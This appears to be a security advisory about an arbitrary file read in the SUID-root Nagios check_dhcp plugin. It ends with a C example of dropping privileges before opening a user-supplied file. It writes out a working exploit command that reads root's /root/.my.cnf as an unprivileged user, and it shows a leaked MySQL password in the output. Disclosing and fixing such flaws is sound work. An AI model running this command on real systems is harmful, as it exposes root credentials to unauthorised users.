
  • Nagios Plugins check_dhcp Arbitrary File Read

    The Nagios plugin check_dhcp requires the root SUID permission on its binary in order to run
    correctly. A default installation of check_dhcp sets the SUID permission automatically.

    # ./configure ; make ; make install

    # ls -l /usr/local/nagios/libexec/check_dhcp
    -r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp

    As we can see in the provided help, the plugin allows reading options from a
    supplied config file via the --extra-opts option:

    # /usr/local/nagios/libexec/check_dhcp --help
    check_dhcp v2.0.1 (nagios-plugins 2.0.1)
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    Read options from an ini file. See
    for usage and examples.

    The option can be used to read parts of any INI-format config file
    available on the system. Because check_dhcp runs as root (thanks to the
    SETUID bit), does not drop root privileges when accessing the config file,
    and does not check whether the given file should be accessible to the user
    executing it, any of root's INI config files can be read this way by an
    unprivileged user on the local system.


    A good example of a program that stores its configuration in INI format is MySQL.
    Administrators often save MySQL credentials in /root/.my.cnf to avoid having
    to type them each time they run a mysql client. Storing MySQL passwords in
    a config file is also suggested for safety in the MySQL docs:

    An example mysql config file could look like this:
    root@server [~]# cat /root/.my.cnf
    If an unprivileged user has access to a system containing a SUID binary of
    the check_dhcp plugin, he could easily use it to retrieve the password
    contained in the /root/.my.cnf file:

    prajith@server[~]$ id
    uid=1000(prajith) gid=1000(prajith) groups=1000(prajith)

    prajith@server[~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=client@/root/.my.cnf
    /usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=nzk?V5l-'
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    As we can see, the contents of the 'client' section of the /root/.my.cnf option
    file get printed as part of the error message.


    The vulnerability has been discovered by legalhackers
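
The root cause described above is that the --extra-opts file is opened while the process still has root's effective uid. One way a set-uid program can open a caller-supplied file with the caller's own permissions, shown as an added example (not code from nagios-plugins or from the original post); the helper name open_as_invoker is hypothetical:

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: open path for reading with the real (invoking)
 * uid/gid, so the kernel applies the caller's permissions, not root's. */
FILE *open_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    FILE *fp;
    int err;

    /* Drop the group first: once euid is not 0, setegid may be refused. */
    if (setegid(getgid()) != 0)
        return NULL;
    if (seteuid(getuid()) != 0) {
        err = errno;
        if (setegid(saved_egid) != 0)
            abort();
        errno = err;
        return NULL;
    }

    fp = fopen(path, "r");      /* access check runs as the invoking user */
    err = errno;

    /* Restore in reverse order. A failed restore leaves the process in an
     * unknown privilege state, so stop instead of continuing. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();
    errno = err;
    return fp;
}

int main(int argc, char **argv)
{
    /* Default path is the file used in the post above. */
    FILE *fp = open_as_invoker(argc > 1 ? argv[1] : "/root/.my.cnf");
    if (fp == NULL) {
        perror("open_as_invoker");
        return 1;
    }
    puts("readable by the invoking user");
    fclose(fp);
    return 0;
}
```

Built as a SUID root binary and run by an unprivileged user against /root/.my.cnf, the fopen call fails with EACCES because the permission check is made with the invoking user's ids.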